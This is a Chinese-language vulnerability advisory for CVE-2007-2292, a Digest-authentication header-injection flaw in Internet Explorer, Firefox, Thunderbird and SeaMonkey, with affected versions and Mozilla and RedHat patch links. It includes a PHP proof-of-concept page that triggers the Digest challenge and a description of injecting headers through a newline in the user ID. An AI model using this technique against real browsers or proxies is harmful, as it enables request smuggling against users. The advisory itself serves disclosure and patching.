发布日期：2007-04-25
更新日期：2007-10-23

受影响系统：

Microsoft Internet Explorer 7.0.5730.11
Mozilla Thunderbird < 2.0.0.8
Mozilla SeaMonkey < 1.1.5

不受影响系统：

Mozilla Thunderbird 2.0.0.8
Mozilla SeaMonkey 1.1.5

描述：

---

BUGTRAQ  ID: 23668
CVE(CAN) ID: CVE-2007-2292

IE和Firefox都是流行的WEB浏览器。

IE和Firefox在处理Digest认证方式时存在漏洞，可能导致验证失败。

如果用户使用Digest认证通过HTTP请求登录到网站的话，Firefox和IE可能无法正确地验证用户ID。恶意的网页可能在用户ID中包含有换行字符（%0a）注入头数据，如果用户通过代理进行连接的话代理就可能将认证请求解释为两个独立的请求，导致注入任意HTTP头。

<*来源：Stefano Di Paola （stefano@dipaola.wisec.it）
  
  链接：http://www.mozilla.org/security/announce/2007/mfsa2007-31.html
        http://marc.info/?l=bugtraq&m=117754528031140&w=2
        https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=378787
        https://www.redhat.com/support/errata/RHSA-2007-0981.html
        https://www.redhat.com/support/errata/RHSA-2007-0980.html
        https://www.redhat.com/support/errata/RHSA-2007-0979.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
header('Set-Cookie: PHPSESSID=6555');
if((int)intval($_COOKIE['PHPSESSID']) !== 6555){
header('HTTP/1.0 401 Authorization Required");
header('WWW-Authenticate: Digest realm="1@example.com", \
qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",\
opaque="5ccc069c403ebaf9f0171e9517f40e41"');
header('Proxy-Connection: keep-alive');
} else {
// header("Set-Cookie: PHPSESSID=0");
}
header('Connection: keep-alive');
?>
<html><head>
<meta http-equiv='Connection' content="keep-alive"></head>
<body><script>
// Some Printing in order to show document DOM properties
// in the poisoned page
for(var i in document)
document.write(i+' '+eval('document.'+i)+'<br>');
</script>
</body>
</html>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/projects/seamonkey/
http://www.mozilla.com/en-US/firefox/

RedHat
------
RedHat已经为此发布了安全公告（RHSA-2007:0981-01、RHSA-2007:0979-01、RHSA-2007:0980-01）以及相应补丁:
RHSA-2007:0981-01：Moderate: thunderbird security update
链接：https://www.redhat.com/support/errata/RHSA-2007-0981.html

RHSA-2007:0979-01：Critical: firefox security update
链接：https://www.redhat.com/support/errata/RHSA-2007-0979.html

RHSA-2007:0980-01：Critical: seamonkey security update
链接：https://www.redhat.com/support/errata/RHSA-2007-0980.html

浏览次数：3310
严重程度：0（网友投票）